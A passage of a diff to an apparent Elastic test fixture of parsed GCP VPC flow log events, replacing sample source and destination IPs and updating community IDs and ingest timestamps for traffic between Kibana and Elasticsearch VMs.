ws\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.513551480Z", "end": "2019-06-14T03:49:37.933099658Z", @@ -8664,18 +8664,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33968, "bytes": 11108, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 95 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:dMHgvk8guroE0eXkr19X6xQ6X24=", + "community_id": "1:F4uNaOBelKx7k5b/GMkE00x7/lw=", "bytes": 11108, "name": "default", "transport": "tcp", @@ -8697,7 +8697,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -8734,8 +8734,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868734400Z", - "original": "{\"insertId\":\"y4wffpfk2eroe\",\"jsonPayload\":{\"bytes_sent\":\"11108\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33968},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.965119632Z\",\"packets_sent\":\"95\",\"reporter\":\"DEST\",\"rtt_msec\":\"201\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.480430427Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391630400Z", + "original": 
"{\"insertId\":\"y4wffpfk2eroe\",\"jsonPayload\":{\"bytes_sent\":\"11108\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33968},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.965119632Z\",\"packets_sent\":\"95\",\"reporter\":\"DEST\",\"rtt_msec\":\"201\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.480430427Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.480430427Z", "end": "2019-06-14T03:49:37.965119632Z", @@ -8762,18 +8762,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33590, "bytes": 67337, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 351 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:LSB085+2dyGfQIXV+wF0qEVVBbM=", + "community_id": "1:hba8zo6o+Om2iBhvTc1A5aHscIQ=", "bytes": 67337, "name": "default", "transport": "tcp", @@ -8795,7 +8795,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -8832,8 +8832,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868738300Z", - "original": "{\"insertId\":\"y4wffpfk2eroa\",\"jsonPayload\":{\"bytes_sent\":\"67337\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33590},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565116665Z\",\"packets_sent\":\"351\",\"reporter\":\"DEST\",\"rtt_msec\":\"109\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147151100Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391635900Z", + "original": 
"{\"insertId\":\"y4wffpfk2eroa\",\"jsonPayload\":{\"bytes_sent\":\"67337\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33590},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565116665Z\",\"packets_sent\":\"351\",\"reporter\":\"DEST\",\"rtt_msec\":\"109\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147151100Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.147151100Z", "end": "2019-06-14T03:49:59.565116665Z", @@ -8860,18 +8860,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 136375, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 246 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:VqjLGbDeItVznngxat3pnPeGkec=", + "community_id": "1:Z4JXA8xt+j3ewQW8WvNJAPaHMoA=", "bytes": 136375, "name": "default", "transport": "tcp", @@ -8893,7 +8893,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -8930,8 +8930,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868741700Z", - "original": "{\"insertId\":\"y4wffpfk2eroi\",\"jsonPayload\":{\"bytes_sent\":\"136375\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33538,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"246\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500483335Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391641300Z", + "original": 
"{\"insertId\":\"y4wffpfk2eroi\",\"jsonPayload\":{\"bytes_sent\":\"136375\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33538,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"246\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500483335Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500483335Z", "end": "2019-06-14T03:49:59.565287007Z", @@ -8952,10 +8952,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33690, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -8969,7 +8969,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:WEAf6ne8e1XsbHxRodKfYT1TGbg=", + "community_id": "1:R07THsJrApr+LxzJU52QZR3EPhM=", "bytes": 181424, "name": "default", "transport": "tcp", @@ -8992,7 +8992,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -9028,8 +9028,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868745300Z", - "original": "{\"insertId\":\"y4wffpfk2ero8\",\"jsonPayload\":{\"bytes_sent\":\"181424\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33690,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.393929808Z\",\"packets_sent\":\"241\",\"reporter\":\"SRC\",\"rtt_msec\":\"196\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075867049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391646800Z", + "original": 
"{\"insertId\":\"y4wffpfk2ero8\",\"jsonPayload\":{\"bytes_sent\":\"181424\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33690,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.393929808Z\",\"packets_sent\":\"241\",\"reporter\":\"SRC\",\"rtt_msec\":\"196\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075867049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075867049Z", "end": "2019-06-14T03:49:56.393929808Z", @@ -9056,18 +9056,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33874, "bytes": 9303, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 94 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:5AIfpIZXAUHToCeVBhXgBuugIac=", + "community_id": "1:kUsQhMSOvL5RMyh4vWwz55fq9ss=", "bytes": 9303, "name": "default", "transport": "tcp", @@ -9089,7 +9089,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -9126,8 +9126,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868748500Z", - "original": "{\"insertId\":\"y4wffpfk2erol\",\"jsonPayload\":{\"bytes_sent\":\"9303\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33874},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933099658Z\",\"packets_sent\":\"94\",\"reporter\":\"DEST\",\"rtt_msec\":\"142\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.513551480Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391652400Z", + "original": 
"{\"insertId\":\"y4wffpfk2erol\",\"jsonPayload\":{\"bytes_sent\":\"9303\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33874},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933099658Z\",\"packets_sent\":\"94\",\"reporter\":\"DEST\",\"rtt_msec\":\"142\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.513551480Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.513551480Z", "end": "2019-06-14T03:49:37.933099658Z", @@ -9148,10 +9148,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33572, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -9165,7 +9165,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:vae84XmwYYRVAple470fSnJPul0=", + "community_id": "1:yNQZdh5JH2wK9uzpK/mTdNYogpE=", "bytes": 142871, "name": "default", "transport": "tcp", @@ -9188,7 +9188,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -9224,8 +9224,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868751800Z", - "original": "{\"insertId\":\"y4wffpfk2ero4\",\"jsonPayload\":{\"bytes_sent\":\"142871\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33572,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821149051Z\",\"packets_sent\":\"77\",\"reporter\":\"SRC\",\"rtt_msec\":\"335\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470754779Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391657800Z", + "original": 
"{\"insertId\":\"y4wffpfk2ero4\",\"jsonPayload\":{\"bytes_sent\":\"142871\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33572,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821149051Z\",\"packets_sent\":\"77\",\"reporter\":\"SRC\",\"rtt_msec\":\"335\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470754779Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.470754779Z", "end": "2019-06-14T03:49:51.821149051Z", @@ -9246,10 +9246,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33968, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -9263,7 +9263,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:dMHgvk8guroE0eXkr19X6xQ6X24=", + "community_id": "1:F4uNaOBelKx7k5b/GMkE00x7/lw=", "bytes": 158811, "name": "default", "transport": "tcp", @@ -9286,7 +9286,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -9322,8 +9322,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868755100Z", - "original": "{\"insertId\":\"y4wffpfk2eror\",\"jsonPayload\":{\"bytes_sent\":\"158811\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33968,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.965119632Z\",\"packets_sent\":\"69\",\"reporter\":\"SRC\",\"rtt_msec\":\"201\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.480430427Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391663200Z", + "original": 
"{\"insertId\":\"y4wffpfk2eror\",\"jsonPayload\":{\"bytes_sent\":\"158811\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33968,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.965119632Z\",\"packets_sent\":\"69\",\"reporter\":\"SRC\",\"rtt_msec\":\"201\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.480430427Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.480430427Z", "end": "2019-06-14T03:49:37.965119632Z", @@ -9350,18 +9350,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33880, "bytes": 13455, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 81 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Kk7/PaNTTm0JkSjavpifN6V8b2s=", + "community_id": "1:p34w66dg33j2mO1tBhizc/ISlFM=", "bytes": 13455, "name": "default", "transport": "tcp", @@ -9383,7 +9383,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -9420,8 +9420,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868758800Z", - "original": "{\"insertId\":\"y4wffpfk2erob\",\"jsonPayload\":{\"bytes_sent\":\"13455\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33880},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821047175Z\",\"packets_sent\":\"81\",\"reporter\":\"DEST\",\"rtt_msec\":\"252\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470071135Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391668700Z", + "original": 
